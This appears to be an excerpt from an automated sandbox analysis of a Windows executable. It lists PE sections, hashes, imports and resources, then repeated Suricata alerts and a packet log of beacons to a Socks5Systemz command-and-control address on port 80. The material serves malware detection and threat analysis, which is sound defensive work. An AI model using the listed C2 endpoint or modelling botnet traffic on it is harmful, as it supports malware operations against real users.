                                                                            mov eax, dword ptr [0040CDF4h]
                                                                            mov edx, 00000028h
                                                                            call 00007FD004C53D08h
                                                                            mov edx, dword ptr [000000F4h]
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            CODE0x10000x93640x94000d7ac17dafcd52a9b3ea353c32256c1dFalse0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            DATA0xb0000x24c0x40045829356498700390b8c7afa10ea05a4False0.31640625data2.7585022150416294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x110000x2c000x2c0012ab88ff2529942b16e663a514fbedeeFalse0.32262073863636365data4.461731535554609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                            RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                            RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                            RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                            RT_STRING0x125740x2f2data0.35543766578249336
                                                                            RT_STRING0x128680x30cdata0.3871794871794872
                                                                            RT_STRING0x12b740x2cedata0.42618384401114207
                                                                            RT_STRING0x12e440x68data0.75
                                                                            RT_STRING0x12eac0xb4data0.6277777777777778
                                                                            RT_STRING0x12f600xaedata0.5344827586206896
                                                                            RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                            RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                            RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                            RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                            DLLImport
                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                            user32.dllMessageBoxA
                                                                            oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                            kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                            user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                            comctl32.dllInitCommonControls
                                                                            advapi32.dllAdjustTokenPrivileges
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            DutchNetherlands
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-14T03:07:57.978929+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44973694.232.249.18780TCP
                                                                            2024-12-14T03:07:57.978929+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44973694.232.249.18780TCP
                                                                            2024-12-14T03:07:58.608004+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44973694.232.249.18780TCP
                                                                            2024-12-14T03:07:58.608004+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44973694.232.249.18780TCP
                                                                            2024-12-14T03:08:00.205019+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44973794.232.249.18780TCP
                                                                            2024-12-14T03:08:00.205019+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44973794.232.249.18780TCP
                                                                            2024-12-14T03:08:01.785416+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44974094.232.249.18780TCP
                                                                            2024-12-14T03:08:01.785416+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44974094.232.249.18780TCP
                                                                            2024-12-14T03:08:03.392194+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44974194.232.249.18780TCP
                                                                            2024-12-14T03:08:03.392194+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44974194.232.249.18780TCP
                                                                            2024-12-14T03:08:05.001033+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44974794.232.249.18780TCP
                                                                            2024-12-14T03:08:05.001033+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44974794.232.249.18780TCP
                                                                            2024-12-14T03:08:06.577197+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44975394.232.249.18780TCP
                                                                            2024-12-14T03:08:06.577197+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44975394.232.249.18780TCP
                                                                            2024-12-14T03:08:08.166473+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:08.166473+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:08.772181+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:08.772181+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:09.377875+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:09.377875+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44975994.232.249.18780TCP
                                                                            2024-12-14T03:08:10.951577+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44976594.232.249.18780TCP
                                                                            2024-12-14T03:08:10.951577+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44976594.232.249.18780TCP
                                                                            2024-12-14T03:08:12.526162+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44977194.232.249.18780TCP
                                                                            2024-12-14T03:08:12.526162+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44977194.232.249.18780TCP
                                                                            2024-12-14T03:08:13.123974+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44977194.232.249.18780TCP
                                                                            2024-12-14T03:08:13.123974+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44977194.232.249.18780TCP
                                                                            2024-12-14T03:08:14.702136+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44977794.232.249.18780TCP
                                                                            2024-12-14T03:08:14.702136+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44977794.232.249.18780TCP
                                                                            2024-12-14T03:08:16.282067+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44977894.232.249.18780TCP
                                                                            2024-12-14T03:08:16.282067+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44977894.232.249.18780TCP
                                                                            2024-12-14T03:08:17.856916+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44978494.232.249.18780TCP
                                                                            2024-12-14T03:08:17.856916+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44978494.232.249.18780TCP
                                                                            2024-12-14T03:08:19.440462+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979094.232.249.18780TCP
                                                                            2024-12-14T03:08:19.440462+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979094.232.249.18780TCP
                                                                            2024-12-14T03:08:21.022814+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979294.232.249.18780TCP
                                                                            2024-12-14T03:08:21.022814+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979294.232.249.18780TCP
                                                                            2024-12-14T03:08:21.623810+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979294.232.249.18780TCP
                                                                            2024-12-14T03:08:21.623810+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979294.232.249.18780TCP
                                                                            2024-12-14T03:08:23.212063+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979894.232.249.18780TCP
                                                                            2024-12-14T03:08:23.212063+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979894.232.249.18780TCP
                                                                            2024-12-14T03:08:23.811479+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44979894.232.249.18780TCP
                                                                            2024-12-14T03:08:23.811479+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44979894.232.249.18780TCP
                                                                            2024-12-14T03:08:25.393608+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44980494.232.249.18780TCP
                                                                            2024-12-14T03:08:25.393608+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44980494.232.249.18780TCP
                                                                            2024-12-14T03:08:26.999223+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44980994.232.249.18780TCP
                                                                            2024-12-14T03:08:26.999223+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44980994.232.249.18780TCP
                                                                            2024-12-14T03:08:28.580571+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44981494.232.249.18780TCP
                                                                            2024-12-14T03:08:28.580571+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44981494.232.249.18780TCP
                                                                            2024-12-14T03:08:30.164823+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44981994.232.249.18780TCP
                                                                            2024-12-14T03:08:30.164823+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44981994.232.249.18780TCP
                                                                            2024-12-14T03:08:30.770392+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44981994.232.249.18780TCP
                                                                            2024-12-14T03:08:30.770392+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44981994.232.249.18780TCP
                                                                            2024-12-14T03:08:32.348769+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44982594.232.249.18780TCP
                                                                            2024-12-14T03:08:32.348769+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44982594.232.249.18780TCP
                                                                            2024-12-14T03:08:33.923562+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44982894.232.249.18780TCP
                                                                            2024-12-14T03:08:33.923562+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44982894.232.249.18780TCP
                                                                            2024-12-14T03:08:35.504852+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44983494.232.249.18780TCP
                                                                            2024-12-14T03:08:35.504852+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44983494.232.249.18780TCP
                                                                            2024-12-14T03:08:37.096939+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44983994.232.249.18780TCP
                                                                            2024-12-14T03:08:37.096939+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44983994.232.249.18780TCP
                                                                            2024-12-14T03:08:38.687703+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44984494.232.249.18780TCP
                                                                            2024-12-14T03:08:38.687703+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44984494.232.249.18780TCP
                                                                            2024-12-14T03:08:40.308518+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44984794.232.249.18780TCP
                                                                            2024-12-14T03:08:40.308518+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44984794.232.249.18780TCP
                                                                            2024-12-14T03:08:41.915277+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44985294.232.249.18780TCP
                                                                            2024-12-14T03:08:41.915277+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44985294.232.249.18780TCP
                                                                            2024-12-14T03:08:43.485288+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44985894.232.249.18780TCP
                                                                            2024-12-14T03:08:43.485288+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44985894.232.249.18780TCP
                                                                            2024-12-14T03:08:45.064366+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44986194.232.249.18780TCP
                                                                            2024-12-14T03:08:45.064366+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44986194.232.249.18780TCP
                                                                            2024-12-14T03:08:46.673589+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44986594.232.249.18780TCP
                                                                            2024-12-14T03:08:46.673589+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44986594.232.249.18780TCP
                                                                            2024-12-14T03:08:48.257697+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44987094.232.249.18780TCP
                                                                            2024-12-14T03:08:48.257697+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44987094.232.249.18780TCP
                                                                            2024-12-14T03:08:48.858160+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44987094.232.249.18780TCP
                                                                            2024-12-14T03:08:48.858160+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44987094.232.249.18780TCP
                                                                            2024-12-14T03:08:50.475692+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:50.475692+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:51.087120+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:51.087120+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:51.699334+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:51.699334+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44987694.232.249.18780TCP
                                                                            2024-12-14T03:08:53.287005+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44988394.232.249.18780TCP
                                                                            2024-12-14T03:08:53.287005+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44988394.232.249.18780TCP
                                                                            2024-12-14T03:08:54.907769+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44988794.232.249.18780TCP
                                                                            2024-12-14T03:08:54.907769+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44988794.232.249.18780TCP
                                                                            2024-12-14T03:08:56.492651+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44989394.232.249.18780TCP
                                                                            2024-12-14T03:08:56.492651+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44989394.232.249.18780TCP
                                                                            2024-12-14T03:08:58.069074+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44989594.232.249.18780TCP
                                                                            2024-12-14T03:08:58.069074+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44989594.232.249.18780TCP
                                                                            2024-12-14T03:08:59.653727+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44989994.232.249.18780TCP
                                                                            2024-12-14T03:08:59.653727+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44989994.232.249.18780TCP
                                                                            2024-12-14T03:09:01.288045+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44990594.232.249.18780TCP
                                                                            2024-12-14T03:09:01.288045+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44990594.232.249.18780TCP
                                                                            2024-12-14T03:09:02.868923+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44990994.232.249.18780TCP
                                                                            2024-12-14T03:09:02.868923+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44990994.232.249.18780TCP
                                                                            2024-12-14T03:09:04.512597+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44991394.232.249.18780TCP
                                                                            2024-12-14T03:09:04.512597+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44991394.232.249.18780TCP
                                                                            2024-12-14T03:09:09.445534+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.44992394.232.249.18780TCP
                                                                            2024-12-14T03:09:09.445534+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.44992394.232.249.18780TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 14, 2024 03:07:56.507107973 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:56.627042055 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:56.627180099 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:56.630903959 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:56.750608921 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:57.978707075 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:57.978929043 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.085033894 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.205084085 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:58.607819080 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:58.608004093 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.725421906 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.725706100 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.845449924 CET804973794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:58.845565081 CET804973694.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:07:58.845613003 CET4973680192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.845668077 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.845885038 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:07:58.965558052 CET804973794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:00.204941988 CET804973794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:00.205018997 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.319219112 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.319541931 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.439318895 CET804974094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:00.439333916 CET804973794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:00.439521074 CET4973780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.439564943 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.439666986 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:00.559418917 CET804974094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:01.785357952 CET804974094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:01.785415888 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:01.934855938 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:01.935141087 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:02.056092978 CET804974094.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:02.056134939 CET804974194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:02.056221008 CET4974080192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:02.056271076 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:02.067209959 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:02.187127113 CET804974194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:03.392119884 CET804974194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:03.392194033 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.506623030 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.506942987 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.626790047 CET804974794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:03.626802921 CET804974194.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:03.626874924 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.626920938 CET4974180192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.627127886 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:03.746856928 CET804974794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.000874043 CET804974794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.001033068 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.119566917 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.120376110 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.239905119 CET804974794.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.240082026 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:05.240082026 CET4974780192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.240374088 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.240509033 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:05.360191107 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.576967001 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.577197075 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.694158077 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.694416046 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823376894 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.823424101 CET804975394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:06.823482037 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823514938 CET4975380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.823694944 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:06.943408966 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.166342974 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.166472912 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.273379087 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.396245003 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.771872044 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:08.772181034 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:08.881850958 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.001867056 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.377691984 CET804975994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:09.377875090 CET4975980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:09.491156101 CET4975980192.168.2.494.232.249.187
